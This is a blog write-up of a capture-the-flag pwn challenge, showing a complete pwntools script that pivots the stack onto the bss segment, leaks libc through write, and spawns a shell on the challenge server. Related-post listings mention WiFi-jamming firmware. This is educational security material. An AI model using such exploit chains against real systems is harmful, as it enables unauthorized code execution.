[BUUCTF-pwn]——[Black Watch 入群题]PWN

最新推荐文章于 2023-08-01 20:38:25 发布
最新推荐文章于 2023-08-01 20:38:25 发布
阅读量228 收藏
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113925155
版权

[BUUCTF-pwn]——[Black Watch 入群题]PWN

在这里插入图片描述

leave = mov ebp esp; pop ebp;
ret = pop eip;
函数本身会自己调用用一次, 我们再手动调用一次就可以进行栈劫持。
可以自己将栈写在纸上或者调试看看

思路

由于可以利用的溢出空间不够, 利用给定的bss段, 利用栈劫持到bss段。进行操作。

下面的 -4操作是因为会有一个pop ebp的指令执行, 执行过后。会 +4

exploit

from pwn import *
from LibcSearcher import *

elf = ELF("./spwn")
p = remote("node3.buuoj.cn",26467)
main_addr = 0x08048513
s_addr = 0x0804A300
leave_ret = 0x08048408

write_got = elf.got['write']
write_plt = elf.plt['write']



payload1 = p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendafter("What is your name?",payload1)


payload2 = 'a' * 0x18 + p32(s_addr - 4) + p32(leave_ret)
p.sendafter("What do you want to say?", payload2)

write_addr = u32(p.recv(4))

print hex(write_addr)

libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump("write")
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")

payload3 = p32(sys_addr) + 'junk' + p32(binsh)
p.sendlineafter("What is your name?",payload3)


payload4 = 'a' * 0x18 + p32(s_addr - 4) + p32(leave_ret)
p.sendlineafter("What do you want to say?", payload4)

p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:[Black Watch ]PWN(write up)
qq_44768749的博客
08-23 792
BUUCTF:[Black Watch ]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
[Black Watch ]PWN
、moddemod
06-20 358
利用bss进行栈迁移 exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './spwn' p = process(proc_name) # p = remote('node3.buuoj.cn', 29482) elf = ELF(proc_name) write_plt = elf.plt['wri.
BUUCTF-[Black Watch ]PWN
Fzuim的博客
04-14 373
常规检查下来,发现可以进行栈溢出,但是允许操作的空间只有8个字节… 看下ida伪代码 可操作空间很小,只能覆盖到eip,正常思路是:泄露write的got表地址,然后通过libcsearch找出system和bin/sh的地址,再次构造栈溢出攻击。此目栈溢出只能操作8字节,一般思路行不通。此时就用到另一个概念:栈迁移!!! 栈迁移的关键点在于esp,能把esp重新指向另外一块内存空间,即可成功。这的另一块内存空间就是bss段。 利用到栈迁移,我们需要在原本栈的eip位置覆盖成 leave;r.
[Black Watch ]PWN(栈迁移到bss)
qq_33590156的博客
08-04 706
from pwn import * from LibcSearcher import * context(os='linux',arch='i386',log_level='debug') ms = remote('node3.buuoj.cn',25353) #ms = process("./spwn") elf = ELF('./spwn') bss_addr = 0x0804A300 lea_ret = 0x08048408 write_plt = elf.plt['write'] write_
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn shellcode 变形shellcode练手目,该目主要是利用三个节点来注shellcode,考验解人对shellcode的熟悉程度。解:https://blog.csdn.net/A951860555/article/details/110350773
ctf库ctf-pwn收集
03-31
ctf库 CTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
[BUUCTF]PWN——[Black Watch ]PWN
mcmuyanga的博客
10-26 2449
[Black Watch ]PWN——栈劫持 密码在 /password.txt Ubuntu 16 2020年02月27日:此已作废,请看新版。 附件 解步骤: 例行检查,32位程序,开启了nx保护 运行一下程序,两次输,测试时发现输长度过长,会报错 32位ida载,首先shift+f12查看一下程序里的字符串,没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 从main函数开始看程序
buuctf [Black Watch ]PWN
qq_42728977的博客
04-10 637
本来想着栈溢出简简单单,然后发现竟然没见过这知识点,堆迁移。 看雪链接
[Black Watch ]Web
SopRomeo的博客
05-28 1767
登录抓包 这是一段以json传的数据,起初对着这个一直想json注,然后发现怎样注都行不通 回到热点列表 发现更改后面的数字会变,谷歌浏览器f12 network 谷歌浏览器f12 network 发现有个php文件,进去 数据存放在这里了,输双引号的时候发现弹出这个 sql注无疑了 刚开始的id是1,由此推断可能是整形注 但是联合查询,报错都没用 bp测试看他究竟过滤了啥 啥都没过滤 卡了挺久的,翻了翻自己博客 极客大挑战finalsql 异或布尔盲注 这有个坑,他返回.
【BUUCTF】[Black Watch ]PWN
m0_51251108的博客
12-27 388
【BUUCTF】[Black Watch ]PWN 记录下刷,方便自己以后回顾,写的很烂,还请见谅 本要用栈迁移 先checksec,file和nc看下程序 32位,动态链接,无canary和pie 思路:vul_function()里最后的read能栈溢出,但位置太短,不够写rop,运用栈迁移跳转至跳转至上一个read,写rop链,ret2libc后就能拿到shell了 主要是如何栈迁移: leave ret相当于: leave => mov esp, ebp; pop ebp
[Black Watch ]PWN(栈迁移)
qq_39869547的博客
02-06 947
栈迁移主要解决溢出空间不足的问, 前提条件知道欲迁移位置的地址。 from LibcSearcher import * from PwnContext.core import * binary = './spwn' debug_libc = './libc-2.23.so' elf = ELF(binary) libc = ELF(debug_libc) local = 1 if local ...
PWN · 栈迁移】[BUUCTF][Black Watch ]PWN
Mr_Fmnwon的博客
08-01 370
进能够覆盖ebp和ret,很难不往栈迁移上想。 修改ebp和ret后我们可以将栈指针指向另一处地址addr,需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发栈迁移的基本过程。 查看整个代码发现没有后门函数。 2.泄露libc 没有system函数的使用,但是有write函数。我们可以通过write泄露write的真实地址,从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。 3.组合流程① read大量数据,可以是 aaaa + write.pl
栈迁移学习(buuctf [Black Watch ])
像初雪一样自由洒落
03-14 982
i春秋的borrowstack是栈迁移和万能gadget的混合,,,然后writeup看的不是很明白,也没有很细的解析,所以,emmm,应该是自己栈迁移学的不是很好,只是知道大概的意思,但是还没有做过,这次在看雪看到文章,就好好学一下,做到啦!! 栈迁移,我觉得比较好理解,如果试过将调用一个函数过程好好自己试过的话,知道控制ebp,可以控制函数的去向,详细可以看看这篇图示:https://b...
[Black Watch ]PWN 栈劫持的利用
半岛铁盒的博客
08-17 328
32位程序,开启了nx保护 没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 思路 第一次输的参数s,那边我们可以写很长的数据,我们可以将我们的rop链布置在那里, 接着执行第二次输,利用站劫持,把程序的执行流程劫持到第一次输的位置就可以了 站劫持利用 做栈劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场 payload1=‘a’*0x18+p32(s-4)+p32(leave_r
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进mqtt-pwn目录:使用命令`cd mqtt-pwn`进mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值